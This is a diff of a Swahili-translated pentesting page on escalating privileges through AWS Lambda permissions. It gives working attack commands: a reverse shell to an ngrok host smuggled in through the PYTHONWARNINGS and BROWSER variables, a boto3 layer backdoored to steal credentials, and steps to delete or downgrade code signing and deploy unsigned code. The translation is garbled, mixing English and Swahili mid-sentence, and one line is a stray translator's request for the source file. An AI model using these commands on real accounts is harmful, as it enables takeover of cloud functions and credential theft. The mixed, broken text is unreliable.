@@ -107,22 +107,22 @@ aws dynamodb create-table --table-name my_table \
 --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
 --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
 ```
-Sasa inawezekana **kuunganisha kazi ya Lambda na jedwali la DynamoDB** kwa **kuunda ramani ya chanzo cha tukio**:
+Sasa inawezekana **connect the Lambda function to the DynamoDB table** kwa **creating an event source mapping**:
 ```bash
 aws lambda create-event-source-mapping --function-name my_function \
 --event-source-arn <arn_of_dynamodb_table_stream> \
 --enabled --starting-position LATEST
 ```
-Na kazi ya Lambda iliyounganishwa na mtiririko wa DynamoDB, mshambuliaji anaweza **kuchochea Lambda kwa njia isiyo ya moja kwa moja kwa kuamsha mtiririko wa DynamoDB**. Hii inaweza kufanywa kwa **kuingiza kipengee** kwenye jedwali la DynamoDB:
+Kwa kuwa Lambda function imeunganishwa na DynamoDB stream, mshambuliaji anaweza **kuchochea Lambda kwa njia isiyo ya moja kwa moja kwa kuamsha DynamoDB stream**. Hii inaweza kufanywa kwa **kuingiza kipengee** kwenye DynamoDB table:
 ```bash
 aws dynamodb put-item --table-name my_table \
 --item Test={S="Random string"}
 ```
-**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu la huduma ya lambda lililotajwa.
+**Potential Impact:** Privesc ya moja kwa moja kwa role ya huduma ya lambda iliyotajwa.
 
 ### `lambda:AddPermission`
 
-Mshambuliaji mwenye ruhusa hii anaweza **kujipe (au wengine) ruhusa zozote** (hii inazalisha sera za msingi wa rasilimali kutoa ufikiaji wa rasilimali):
+Mshambuliaji aliye na ruhusa hii anaweza **kujipa yeye mwenyewe (au wengine) ruhusa yoyote** (hii inaunda sera zinazotegemea rasilimali ili kutoa ufikiaji kwa rasilimali):
 ```bash
 # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
 aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>
@@ -130,23 +130,23 @@ aws lambda add-permission --function-name <func_name> --statement-id asdasd --ac
 # Invoke the function
 aws lambda invoke --function-name <func_name> /tmp/outout
 ```
-**Madhara Yanayoweza Kutokea:** Privesc ya moja kwa moja kwa jukumu la huduma ya lambda inayotumika kwa kutoa ruhusa ya kubadilisha msimbo na kuutekeleza.
+**Athari Inayowezekana:** privesc ya moja kwa moja kwa role ya service ya lambda kwa kumpa ruhusa ya kubadilisha code na kuikimbia.
 
 ### `lambda:AddLayerVersionPermission`
 
-Mshambuliaji mwenye ruhusa hii anaweza **kujipe mwenyewe (au wengine) ruhusa `lambda:GetLayerVersion`**. Anaweza kufikia safu na kutafuta udhaifu au taarifa nyeti.
+Mshambulizi mwenye ruhusa hii anaweza **kumpa yeye mwenyewe (au wengine) ruhusa ya `lambda:GetLayerVersion`**. Anaweza kufikia layer na kutafuta udhaifu au taarifa nyeti
 ```bash
 # Give everyone the permission lambda:GetLayerVersion
 aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
 ```
-**Madhara Yanayoweza Kutokea:** Upatikanaji wa taarifa nyeti.
+**Athari Inayowezekana:** Ufikiaji unaowezekana wa taarifa nyeti.
 
 ### `lambda:UpdateFunctionCode`
 
-Watumiaji wanaoshikilia ruhusa ya **`lambda:UpdateFunctionCode`** wana uwezo wa **kubadilisha msimbo wa kazi ya Lambda iliyopo ambayo imeunganishwa na jukumu la IAM.**\
-Mshambuliaji anaweza **kubadilisha msimbo wa lambda ili kuhamasisha akreditivu za IAM.**
+Watumiaji wenye ruhusa **`lambda:UpdateFunctionCode`** wanaweza **kubadilisha msimbo wa Lambda function iliyopo ambayo imeunganishwa na role ya IAM.**\
+Attacker anaweza **kubadilisha msimbo wa Lambda ili exfiltrate the IAM credentials**.
 
-Ingawa mshambuliaji huenda hana uwezo wa moja kwa moja kuanzisha kazi hiyo, ikiwa kazi ya Lambda tayari ipo na inafanya kazi, kuna uwezekano kwamba itasababishwa kupitia michakato au matukio yaliyopo, hivyo kusaidia kwa njia isiyo ya moja kwa moja utekelezaji wa msimbo uliobadilishwa.
+Ingawa attacker huenda hana uwezo wa moja kwa moja wa invoke the function, ikiwa Lambda function tayari ipo na inafanya kazi, kuna uwezekano itachochewa kupitia workflows au events zilizopo, hivyo kwa njia isiyo ya moja kwa moja kuwezesha utekelezaji wa msimbo uliobadilishwa.
 ```bash
 # The zip should contain the lambda code (trick: Download the current one and add your code there)
 aws lambda update-function-code --function-name target_function \
@@ -157,27 +157,27 @@ aws lambda invoke --function-name my_function output.txt
 
 # If not check if it's exposed in any URL or via an API gateway you could access
 ```
-**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu la huduma ya lambda lililotumika.
+**Athari Inayoweza Kutokea:** Privesc moja kwa moja kwa service role ya lambda inayotumika.
 
 ### `lambda:UpdateFunctionConfiguration`
 
-#### RCE kupitia mabadiliko ya mazingira
+#### RCE kupitia env variables
 
-Kwa ruhusa hizi inawezekana kuongeza mabadiliko ya mazingira ambayo yatapelekea Lambda kutekeleza msimbo usio na mpangilio. Kwa mfano, katika python inawezekana kutumia mabadiliko ya mazingira `PYTHONWARNING` na `BROWSER` kufanya mchakato wa python kutekeleza amri zisizo na mpangilio:
+Kwa ruhusa hizi inawezekana kuongeza environment variables zitakazofanya lambda itekeleze arbitrary code. Kwa mfano, katika python inawezekana kutumia vibaya environment variables `PYTHONWARNING` na `BROWSER` ili kufanya mchakato wa python utekeleze amri zozote:
 ```bash
 aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
 ```
-Kwa lugha nyingine za skripti kuna mabadiliko mengine ya mazingira unayoweza kutumia. Kwa maelezo zaidi angalia sehemu ndogo za lugha za skripti katika:
+Kwa lugha nyingine za scripting kuna env variables nyingine unaweza kutumia. Kwa maelezo zaidi angalia subsections za scripting languages katika:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html
 {{#endref}}
 
-#### RCE kupitia Lambda Layers
+#### RCE via Lambda Layers
 
-[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) inaruhusu kujumuisha **code** katika kazi yako ya lamdba lakini **kuhifadhi kwa tofauti**, hivyo msimbo wa kazi unaweza kubaki mdogo na **kazi kadhaa zinaweza kushiriki msimbo**.
+[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) inakuwezesha kujumuisha **code** katika lamdba function yako lakini **kuihifadhi kando**, hivyo code ya function inaweza kubaki ndogo na **functions kadhaa zinaweza kushiriki code**.
 
-Ndani ya lambda unaweza kuangalia njia ambazo msimbo wa python unaloadiwa kwa kutumia kazi kama ifuatavyo:
+Ndani ya lambda unaweza kuangalia paths kutoka ambako python code inapakiwa kwa function ifuatayo:
 ```python
 import json
 import sys
@@ -185,7 +185,7 @@ import sys
 def lambda_handler(event, context):
 print(json.dumps(sys.path, indent=2))
 ```
-Hizi ndizo sehemu:
+Haya ni maeneo:
 
 1. /var/task
 2. /opt/python/lib/python3.7/site-packages
@@ -198,61 +198,120 @@ Hizi ndizo sehemu:
 9. /opt/python/lib/python3.7/site-packages
 10. /opt/python
 
-Kwa mfano, maktaba boto3 inapakuliwa kutoka `/var/runtime/boto3` (nafasi ya 4).
+For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).
 
-#### Ukatili
+#### Utekelezaji
 
-Inawezekana kutumia ruhusa `lambda:UpdateFunctionConfiguration` ili **kuongeza safu mpya** kwenye kazi ya lambda. Ili kutekeleza msimbo wowote, safu hii inahitaji kuwa na **maktaba ambayo lambda itakuwa inaiagiza.** Ikiwa unaweza kusoma msimbo wa lambda, unaweza kuipata hii kwa urahisi, pia kumbuka kwamba inaweza kuwa inawezekana kwamba lambda **tayari inatumia safu** na unaweza **kupakua** safu hiyo na **kuongeza msimbo wako** humo.
+Inawezekana kutumia vibaya ruhusa `lambda:UpdateFunctionConfiguration` ili **kuongeza layer mpya** kwa lambda function. Ili kuendesha code yoyote, layer hii inahitaji kuwa na some **library that the lambda is going to import.** Ikiwa unaweza kusoma code ya lambda, unaweza kubaini hili kwa urahisi; pia kumbuka kuwa inawezekana lambda **tayari inatumia layer** na unaweza **kupakua** layer hiyo na **kuongeza code yako** ndani yake.
 
-Kwa mfano, hebu tuwe na dhana kwamba lambda inatumia maktaba boto3, hii itaunda safu ya ndani na toleo la mwisho la maktaba:
+Kwa mfano, tuseme lambda inatumia library boto3; hii itaunda local layer yenye toleo la mwisho la library:
 ```bash
 pip3 install -t ./lambda_layer boto3
 ```
-Unaweza kufungua `./lambda_layer/boto3/__init__.py` na **kuongeza backdoor katika msimbo wa kimataifa** (kazi ya kutoa taarifa za kuingia au kupata shell ya kurudi kwa mfano).
+Unaweza kufungua `./lambda_layer/boto3/__init__.py` na **kuongeza backdoor katika global code** (mfano, function ya ku-exfiltrate credentials au kupata reverse shell).
 
-Kisha, zipa hiyo `./lambda_layer` directory na **pakia layer mpya ya lambda** katika akaunti yako (au katika ya waathirika, lakini huenda usiwe na ruhusa kwa hili).\
-Kumbuka kwamba unahitaji kuunda folda ya python na kuweka maktaba ndani yake ili kubadilisha /opt/python/boto3. Pia, layer inahitaji kuwa **inasadifu na toleo la python** linalotumika na lambda na ikiwa unaiweka kwenye akaunti yako, inahitaji kuwa katika **eneo lile lile:**
+Kisha, zip directory `./lambda_layer` hiyo na **upload the new lambda layer** kwenye account yako (au kwenye account ya mwathirika, lakini huenda huna permissions kwa hilo).\
+Kumbuka kwamba unahitaji kuunda python folder na kuweka libraries huko ili ku-override /opt/python/boto3. Pia, layer inahitaji kuwa **compatible na python version** inayotumika na lambda, na ikiwa uta-i-upload kwenye account yako, inapaswa kuwa katika **same region:**
 ```bash
 aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
 ```
-Sasa, fanya tabaka la lambda lililo pandishwa **liweze kufikiwa na akaunti yoyote**:
+Sasa, fanya lambda layer iliyopakuliwa **inapatikane kwa akaunti yoyote**:
 ```bash
 aws lambda add-layer-version-permission --layer-name boto3 \
 --version-number 1 --statement-id public \
 --action lambda:GetLayerVersion --principal *
 ```
-Na uambatishe tabaka la lambda kwenye kazi ya lambda ya mwathirika:
+Ambatanisha lambda layer kwenye victim lambda function:
 ```bash
 aws lambda update-function-configuration \
 --function-name <func-name> \
 --layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
 --timeout 300 #5min for rev shells
 ```
-Hatua inayofuata itakuwa **kuitisha kazi** sisi wenyewe ikiwa tunaweza au kusubiri hadi **itakapotishwa** kwa njia za kawaida - ambayo ni njia salama zaidi.
+The next step would be to either **kuitisha function** ourselves if we can or to wait until **inaitwa** by normal means–which is the safer method.
 
-Njia **ya siri zaidi ya kutumia udhaifu huu** inaweza kupatikana katika:
+A **more stealth way to exploit this vulnerability** can be found in:
 
 {{#ref}}
 ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
 {{#endref}}
 
-**Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa jukumu la huduma ya lambda inayotumika.
+**Potential Impact:** Direct privesc to the lambda service role used.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
 
-Labda kwa ruhusa hizo unaweza kuunda kazi na kuitekeleza kwa kuita URL... lakini sikuweza kupata njia ya kuijaribu, hivyo nijulishe ikiwa utaweza!
+Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do!
 
 ### Lambda MitM
 
-Baadhi ya lambdas zitakuwa **zinapokea taarifa nyeti kutoka kwa watumiaji katika vigezo.** Ikiwa unapata RCE katika moja yao, unaweza kuhamasisha taarifa ambazo watumiaji wengine wanazituma, angalia katika:
+Baadhi ya lambdas zitapokea **taarifa nyeti kutoka kwa watumiaji kupitia parameters.** Ikiwa unapata RCE katika moja ya hizo, unaweza exfiltrate taarifa ambazo watumiaji wengine wanazituma kwa lambda hiyo; angalia kwenye:
 
 {{#ref}}
 ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-## Marejeo
+## References
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
 
 {{#include ../../../banners/hacktricks-training.md}}
+
+
+
+
+### `lambda:DeleteFunctionCodeSigningConfig` or `lambda:PutFunctionCodeSigningConfig` + `lambda:UpdateFunctionCode` — Bypass Lambda Code Signing
+
+If a Lambda function enforces code signing, an attacker who can either remove the Code Signing Config (CSC) or downgrade it to Warn can deploy unsigned code to the function. This bypasses integrity protections without modifying the function's IAM role or triggers.
+
+Permissions (one of):
+- Path A: `lambda:DeleteFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
+- Path B: `lambda:CreateCodeSigningConfig`, `lambda:PutFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
+
+Notes:
+- For Path B, you don't need an AWS Signer profile if the CSC policy is set to `WARN` (unsigned artifacts allowed).
+
+Steps (REGION=us-east-1, TARGET_FN=<target-lambda-name>):
+
+Tayarisha payload ndogo:
+```bash
+cat > handler.py <<'PY'
+import os, json
+def lambda_handler(event, context):
+return {"pwn": True, "env": list(os.environ)[:6]}
+PY
+zip backdoor.zip handler.py
+```
+Njia A) Ondoa CSC kisha sasisha code:
+```bash
+aws lambda get-function-code-signing-config --function-name $TARGET_FN --region $REGION && HAS_CSC=1 || HAS_CSC=0
+if [ "$HAS_CSC" -eq 1 ]; then
+aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION
+fi
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
+# If the handler name changed, also run:
+aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
+```
+Njia B) Punguza kuwa Warn na sasisha msimbo (ikiwa kufuta hakuruhusiwi):
+```bash
+CSC_ARN=$(aws lambda create-code-signing-config \
+--description ht-warn-csc \
+--code-signing-policies UntrustedArtifactOnDeployment=WARN \
+--query CodeSigningConfig.CodeSigningConfigArn --output text --region $REGION)
+aws lambda put-function-code-signing-config --function-name $TARGET_FN --code-signing-config-arn $CSC_ARN --region $REGION
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
+# If the handler name changed, also run:
+aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
+```
+Tafadhali tuma maudhui ya faili (src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) ili niweze kuyatafsiri kwa Kiswahili. Nitahifadhi markdown, tags, links, code, na paths bila kutafsiri.
+```bash
+aws lambda invoke --function-name $TARGET_FN /tmp/out.json --region $REGION >/dev/null
+cat /tmp/out.json
+```
+Athari inayowezekana: Uwezo wa kusukuma na kuendesha arbitrary unsigned code katika function ambayo ilipaswa kutekeleza signed deployments, na hivyo kupelekea code execution kwa kutumia function role's permissions.
+
+Usafishaji:
+```bash
+aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION || true
+```
+